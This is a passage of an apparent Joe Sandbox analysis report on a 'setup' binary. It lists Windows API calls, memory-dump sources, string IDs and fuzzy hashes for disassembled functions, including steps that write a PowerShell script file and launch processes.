                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastProcess$Init_thread_footer$CloseCodeCreateExitHandleHeapObjectSingleWait
                                                                                                                                                                              • String ID: "%s" %s$D
                                                                                                                                                                              • API String ID: 2023784982-3971972636
                                                                                                                                                                              • Opcode ID: 740596377933abbc71499c318dd097bbb9ab770d0c7a3c01bb5f943584e1fab3
                                                                                                                                                                              • Instruction ID: ee403600ccab3c6a50b0a4edd296526118e5ae7c944df42923b817f7d6a43f4a
                                                                                                                                                                              • Opcode Fuzzy Hash: 740596377933abbc71499c318dd097bbb9ab770d0c7a3c01bb5f943584e1fab3
                                                                                                                                                                              • Instruction Fuzzy Hash: B051E571904205DFDB10CF69CC44B6EB7F5FF8A724F2447A9E416A7690DB70A885CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,0000043A,00000000,00000074), ref: 00BD5115
                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000020), ref: 00BD518B
                                                                                                                                                                              • GetDC.USER32(?), ref: 00BD51AE
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 00BD51B5
                                                                                                                                                                              • MulDiv.KERNEL32(?,00000048,00000000), ref: 00BD51C8
                                                                                                                                                                              • SendMessageW.USER32(?,00000444,00000000,00000074), ref: 00BD51FA
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00BD5236
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$CapsDeleteDeviceObjectlstrcpyn
                                                                                                                                                                              • String ID: ?$t
                                                                                                                                                                              • API String ID: 2619291461-1995845436
                                                                                                                                                                              • Opcode ID: 68ddcc437193423147d9d725853a1c404ba24644e8582ede5c7fa22986f708c1
                                                                                                                                                                              • Instruction ID: a210eb1e1684683b4dc2c1b2700301ff3bd663ae7a086e502c4cfd5246f2fe56
                                                                                                                                                                              • Opcode Fuzzy Hash: 68ddcc437193423147d9d725853a1c404ba24644e8582ede5c7fa22986f708c1
                                                                                                                                                                              • Instruction Fuzzy Hash: 9F514C71508740AFE721DF61DC49B9BBBE8EB48701F00492EF699E6291E774A508CB62
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA699C,02141699,00000000,?,?,?,?,?,?,00BB632E,00DAB45D,000000FF), ref: 00BB6B3D
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00BB6BB8
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00BB6C5E
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA699C), ref: 00BB6CB3
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalCursorLoadSection$EnterLeave
                                                                                                                                                                              • String ID: v$AtlAxWin140$AtlAxWinLic140$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                                                                                                                              • API String ID: 3727441302-4127849342
                                                                                                                                                                              • Opcode ID: ef574327c052801ff36cc9b966d51d2b8b2098062b6490566f3731ea32de6f4c
                                                                                                                                                                              • Instruction ID: ea7993f295b3026148d952e67481dbb2ad69d9be38a51eac408fac067267e119
                                                                                                                                                                              • Opcode Fuzzy Hash: ef574327c052801ff36cc9b966d51d2b8b2098062b6490566f3731ea32de6f4c
                                                                                                                                                                              • Instruction Fuzzy Hash: BB51F4B1C01218AFDB11CFA5D855BEEBBF8FB09314F14026AE504F7291DBB55A49CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 00C5F8DA
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00C5F8F2
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00C5F90A
                                                                                                                                                                              • IntersectRect.USER32(?,?,?), ref: 00C5F927
                                                                                                                                                                              • EqualRect.USER32(?,?), ref: 00C5F937
                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00C5F94D
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00C5F976
                                                                                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00C5F98B
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00C5F99A
                                                                                                                                                                              • SetBrushOrgEx.GDI32(?,?,?,00000000), ref: 00C5F9B8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Rect$Brush$ColorEqualIntersectLongPointsVisible
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2158939716-0
                                                                                                                                                                              • Opcode ID: 8c5982361d4da97242dd53da88d700685129050eaab000f896c86d3c0836f652
                                                                                                                                                                              • Instruction ID: 2db0677c207b94138389c5ef18455593bfa45516bd5ce843f68c1d61a3d42220
                                                                                                                                                                              • Opcode Fuzzy Hash: 8c5982361d4da97242dd53da88d700685129050eaab000f896c86d3c0836f652
                                                                                                                                                                              • Instruction Fuzzy Hash: 1E418F366083059FC710DF25D844A5BB7E8FF99715F05462EF989E3250EB30EE898B62
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDC.USER32(?), ref: 00BBA831
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00BBA858
                                                                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 00BBA868
                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00BBA889
                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00BBA896
                                                                                                                                                                              • FillRect.USER32(?,?,00000006), ref: 00BBA8DA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CompatibleCreateRect$BitmapClientDeleteFill
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1262984673-0
                                                                                                                                                                              • Opcode ID: 84e125e8a04242f15bcc06d4cd3c7a4217796b73c192d23655c206c3ce0d5d98
                                                                                                                                                                              • Instruction ID: 26668fd3d1104cbf65bf56cedf4854e42f0708d1f8843b39e1364e2d7fa8a421
                                                                                                                                                                              • Opcode Fuzzy Hash: 84e125e8a04242f15bcc06d4cd3c7a4217796b73c192d23655c206c3ce0d5d98
                                                                                                                                                                              • Instruction Fuzzy Hash: CC31C3715043019FC715DF29DC88B6BBBE8FF98304F51086EF886D2161DBB18849CB62
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __aulldiv
                                                                                                                                                                              • String ID: :$f$f$f$p$p$p
                                                                                                                                                                              • API String ID: 3732870572-1434680307
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                                • Part of subcall function 00BAA2A0: FindResourceW.KERNEL32(00000000,?,00000006,?,?,*.*,8007000E,80004005,00BC2B04,00000000,?,?,?,*.*,?,80070057), ref: 00BAA2C3
                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,ps1,ps1,00000003,?,00CE41D8), ref: 00D06C93
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,0000FEFF,00000002,?,00000000), ref: 00D06CD7
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 00D06CF4
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00D06D0E
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,00000000), ref: 00D06D4D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$CloseHandleInit_thread_footerWrite$CreateFindHeapProcessResource
                                                                                                                                                                              • String ID: Unable to get temp file $Unable to save script file $ps1
                                                                                                                                                                              • API String ID: 2821137686-4253966538
                                                                                                                                                                              APIs
                                                                                                                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00DA6A8F), ref: 00DA5D25
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DecodePointer
                                                                                                                                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                              • API String ID: 3527080286-3064271455
                                                                                                                                                                              APIs
                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00D83B07
                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00D83B0F
                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00D83B98
                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00D83BC3
                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00D83C18
                                                                                                                                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00D83C2E
                                                                                                                                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00D83C43
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
                                                                                                                                                                              • String ID: csm
                                                                                                                                                                              • API String ID: 1385549066-1018135373
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BA98C5
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BA9910
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                              • String ID: </a>$<a href="$<a>$Hi$Hi
                                                                                                                                                                              • API String ID: 1385522511-4214971700
                                                                                                                                                                              APIs
                                                                                                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00CCD5D6
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CCD5E7
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00CCD603
                                                                                                                                                                              • GetExitCodeProcess.KERNEL32(00000000,00DEC257), ref: 00CCD614
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00CCD622
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseCodeErrorExecuteExitHandleLastObjectProcessShellSingleWait
                                                                                                                                                                              • String ID: <$open
                                                                                                                                                                              • API String ID: 1481985272-1930408713
                                                                                                                                                                              • Opcode ID: 53f4dbba0f3d9ef10770691c98113cd96883f243b78f52e658e415e506c3b317
                                                                                                                                                                              • Instruction ID: 7a4664adff44436ecd280edf3a77af4b7cd417cd649dc9c9d44bd9831990049c
                                                                                                                                                                              • Opcode Fuzzy Hash: 53f4dbba0f3d9ef10770691c98113cd96883f243b78f52e658e415e506c3b317
                                                                                                                                                                              • Instruction Fuzzy Hash: D4616AB1D006499FDB10CFA9C844B9EBBB4FF49324F14826DE826AB391D7759E44CB90
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetLastError.KERNEL32(0000000E,02141699,?,?,00000000,?), ref: 00BBA16E
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BBA1AF
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA699C), ref: 00BBA1CF
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA699C), ref: 00BBA1F3
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,00000000,00000000,00EA699C,?,80000000,00000000,80000000,00000000,00000000,00000000), ref: 00BBA24E
                                                                                                                                                                                • Part of subcall function 00D7F902: GetProcessHeap.KERNEL32(00000008,00000008,?,00BB83B7,?,?,00BB8164,?), ref: 00D7F907
                                                                                                                                                                                • Part of subcall function 00D7F902: HeapAlloc.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F90E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalHeapSection$AllocCreateCurrentEnterErrorLastLeaveProcessThreadWindow
                                                                                                                                                                              • String ID: v$AXWIN UI Window
                                                                                                                                                                              • API String ID: 213679520-2690018532
                                                                                                                                                                              • Opcode ID: 926621ac5943f116de6fe0cef5eb505d47df0b18f25916eedb46637d19e05d30
                                                                                                                                                                              • Instruction ID: 85a2330f8fc84fe8f071a45121e54732a2bd6733231311ce1bbaffd3c28817a8
                                                                                                                                                                              • Opcode Fuzzy Hash: 926621ac5943f116de6fe0cef5eb505d47df0b18f25916eedb46637d19e05d30
                                                                                                                                                                              • Instruction Fuzzy Hash: B151B571A00345EFDB10DF59DD05BAABBF4FB89B14F10825AF904B7290D7B2A814CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BBE26F
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,?,0214169B), ref: 00BBE2C3
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00BBE320
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D802A8
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00BBE387
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00D7CF5B), ref: 00BBE3AD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$CloseEnterFileHandleLeave$ConditionCreateInit_thread_footerVariableWakeWrite
                                                                                                                                                                              • String ID: aix$html
                                                                                                                                                                              • API String ID: 2030708724-2369804267
                                                                                                                                                                              • Opcode ID: 445d89464d1dd2dc030ac855238df7dfc2597648fe7e1eff85c4a0141e9e5962
                                                                                                                                                                              • Instruction ID: 6e73356f5937b870a465dfb3714ad38fac921c0c17de11a5499d7dbcb755e74e
                                                                                                                                                                              • Opcode Fuzzy Hash: 445d89464d1dd2dc030ac855238df7dfc2597648fe7e1eff85c4a0141e9e5962
                                                                                                                                                                              • Instruction Fuzzy Hash: 20619A70901248DFDB10CFA4D949BEEBBF4FB8A708F244159E011BB2D1D7B56948CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00EA1668,00000000,02141699,00000000,00DE7E63,000000FF,?,02141699), ref: 00BA29A3
                                                                                                                                                                              • GetLastError.KERNEL32(?,02141699), ref: 00BA29AD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountCriticalErrorInitializeLastSectionSpin
                                                                                                                                                                              • String ID: VolumeCostAvailable$VolumeCostDifference$VolumeCostRequired$VolumeCostSize$VolumeCostVolume
                                                                                                                                                                              • API String ID: 439134102-34576578
                                                                                                                                                                              • Opcode ID: d934e9c181871b2a384a1942533105c79a1339d690d3ae29f96d3ee8cb2c45be
                                                                                                                                                                              • Instruction ID: 6eab475e4491b0fa11df670ca1eaa7ae4b6f610ad8dbe3c83c15b8d203c2d534
                                                                                                                                                                              • Opcode Fuzzy Hash: d934e9c181871b2a384a1942533105c79a1339d690d3ae29f96d3ee8cb2c45be
                                                                                                                                                                              • Instruction Fuzzy Hash: 0A51F3B1904259DFCB10DF99DD0679E7BF4EB4A720F1842A9E814F7380E774A908CB61
                                                                                                                                                                              APIs
                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000023,?,?,?,?,00EA16AC), ref: 00D14250
                                                                                                                                                                              • LoadLibraryW.KERNEL32(Shell32.dll,?,?,00EA16AC), ref: 00D14263
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00D14273
                                                                                                                                                                              • SHGetPathFromIDListW.SHELL32(?,00000000), ref: 00D142FC
                                                                                                                                                                              • SHGetMalloc.SHELL32(?), ref: 00D1433E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressFolderFromLibraryListLoadLocationMallocPathProcSpecial
                                                                                                                                                                              • String ID: SHGetSpecialFolderPathW$Shell32.dll
                                                                                                                                                                              • API String ID: 2352187698-2988203397
                                                                                                                                                                              • Opcode ID: 4c3694cca11538643a960c7405bd2006d5e979853294b40cc0ea4a78a6541ece
                                                                                                                                                                              • Instruction ID: bc7d03114583099f47f5131b04545baf1502e879668160879df19a3a70a68122
                                                                                                                                                                              • Opcode Fuzzy Hash: 4c3694cca11538643a960c7405bd2006d5e979853294b40cc0ea4a78a6541ece
                                                                                                                                                                              • Instruction Fuzzy Hash: 19310271640701AFDB209F29EC05BAB77F5EF94711F58842CF889971A0EF7198CA87A1
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CAA4E0
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
